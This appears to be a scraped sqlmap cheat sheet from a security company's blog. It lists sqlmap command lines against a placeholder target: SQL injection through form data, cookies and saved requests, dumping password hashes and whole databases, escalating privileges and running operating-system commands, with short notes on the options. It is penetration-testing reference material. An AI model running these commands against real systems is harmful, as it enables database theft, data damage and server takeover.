https://www.abrictosecurity.com/blog/sqlmap-cheatsheet-and-examples/
sqlmap **-u '<http://target.server.com>'**sqlmap -u '<http://target.server.com>' **--data='param1=blah¶m2=blah'**sqlmap -u '<http://target.server.com>' **--cookie='JSESSIONID=09h76qoWC559GH1K7DSQHx'**sqlmap -u '<http://target.server.com>' -r req.txt **--drop-set-cookie**sqlmap -u '<http://target.server.com>' --data='param1=blah' **--level=5 --risk=3**sqlmap -u '<http://target.server.com>' --data='param1=blah¶m2=blah' **-p param1**sqlmap -u '<http://target.server.com>' -r req.txt **--random-agent**sqlmap -u '<http://target.server.com>' -r req.txt **--dbms Oracle**sqlmap **-r ./req.txt -p user --level=1 --risk=3 --passwords**sqlmap -r ./req.txt --level=1 --risk=3 **--privesc**sqlmap -r ./req.txt --level=1 --risk=3 **--os-cmd=whoami**sqlmap -r ./req.txt --level=1 --risk=3 **--dump --delay=1**Here are some useful options for your pillaging pleasure:
-r req.txt Specify a request stored in a text file, great for saved requests from BurpSuite.
–force-ssl Force SQLmap to use SSL or TLS for its requests.
–level=1 only test against the specified parameter, ignore all others.
–risk=3 Run all exploit attempts, even the dangerous ones (could damage database).
–delay Set a delay in-between requests, great for throttled connections.